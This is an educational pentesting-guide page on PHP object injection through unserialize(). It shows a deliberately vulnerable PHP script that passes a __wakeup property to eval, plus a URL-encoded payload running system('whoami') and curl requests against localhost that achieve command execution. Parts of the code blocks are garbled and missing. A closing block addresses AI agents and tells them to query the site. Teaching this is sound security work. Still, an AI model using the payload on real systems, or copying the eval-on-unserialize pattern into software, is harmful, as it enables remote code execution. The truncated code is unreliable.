# PHP deserialisation ## Introduction First of all, let's explain what serialisation and deserialisation mean. The serialisation of an object transforms an object from Object Programming languages such as Java, Python or PHP into a format that can be stored or transferred. Deserailsation turns serialised objects from files or the network into ordinary programming objects. An attacker could manipulate serialised objects to change the application's logic, perform a denial service, or execute arbitrary code when deserialised. ## Proof of Concept When you control a serialised object that is passed into unserialised(), you can control the properties of the created object. You might also be able to hijack the flow of the application by controlling the values passed into automatically executed methods like **\_\_wakeup()**, or **\_\_destruct()**. In this Proof of concept, the vulnerable code receives a serialised object through the GET parameter `r`, then unserialises it into an array, printing the first two values. However, an attacker could create its own `inject` variable, which value will be executed by the function `eval` just after the `unserialize` function was performed due to the function `__ wakeup()`. **Vulnerable code**: ```php inject)){ eval($this->inject); } } } if(isset($_REQUEST['r'])){ $var1=unserialize($_REQUEST['r']); if(is_array($var1)){ echo "
".$var1[0]." - ".$var1[1]; } } else{ echo ""; # nothing happens here } ?> php -S localhost:8080 vuln.php ``` **Exploit** : ```php ``` ```bash php exploit.php # Intended use a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D # Malicious use O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D ``` **Result**: As you can see below, because the attacker could replace the `$inject` variable with the command "whoami", the attacker gained RCE knowing the user who executed the PHP service. ```bash curl http://localhost:8080?r=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22vul%22%3Bi%3A1%3Bs%3A7%3A%22nerable%22%3B%7D vul - nerable curl http://localhost:8080?r=O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D kali ``` ## References * [Several exploits \[PayloadAllTheThings\]](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/PHP.md) * [PHP Object Injection \[OWASP\]](https://owasp.org/www-community/vulnerabilities/PHP_Object_Injection) * [Exploiting PHP deserialization \[Medium\]](https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a) * [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) * [Exploiting insecure deserialization vulnerabilities](https://portswigger.net/web-security/deserialization/exploiting) * [Magic methods](https://www.php.net/manual/en/language.oop5.magic.php#object.wakeup) * [What is Phar Deserialization](https://www.sonarsource.com/blog/new-php-exploitation-technique/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/web/php_deserailisation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.